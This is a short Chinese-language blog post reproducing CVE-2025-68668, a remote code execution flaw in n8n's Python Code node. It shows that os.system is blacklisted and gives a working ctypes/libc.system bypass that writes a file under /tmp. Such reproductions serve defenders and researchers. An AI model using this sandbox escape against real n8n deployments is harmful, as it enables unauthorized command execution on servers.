CVE-2025-68668 python n8n rce 漏洞复现
admin
|
|
554
|
安全

280 字
|
2 分钟

CVE-2025-68668 python n8n rce 漏洞复现

n8n (发音为 n-eight-n) 是一款开源的、可视化的工作流自动化工具,它能帮助用户连接不同的应用、服务和系统(如 Google DocsSlackLINE, ChatGPT)来构建自动化的工作流程,替代手动重复操作,实现数据同步、任务管理和流程自动化,支持拖拽式操作,对非编程背景用户友好,也可自托管或使用云服务.。

攻击者必须是 已认证用户 并具有 创建或修改工作流权限,才能进行漏洞利用。

影响范围:n8n version >=1.0.0 <2.0.0

如果正常来使用python运行代码,例如:
import os
os.system('id')

这个是会被拦截的,会提示 RuntimeError: Blocked for security reasons

n8n在 packages/nodes-base/nodes/Code/Pyodide.ts 中写了黑名单拦截该函数

但是我们可以用 ctypes 这个函数来调用 libc / syscall达到命令执行的效果

import ctypes

libc = ctypes.CDLL(None)
result = libc.system(b'echo "SUCCESS" > /tmp/CVE-2025-68668.txt')
return {}

查看/tmp/CVE-2025-68668.txt文件已创建

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
															
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇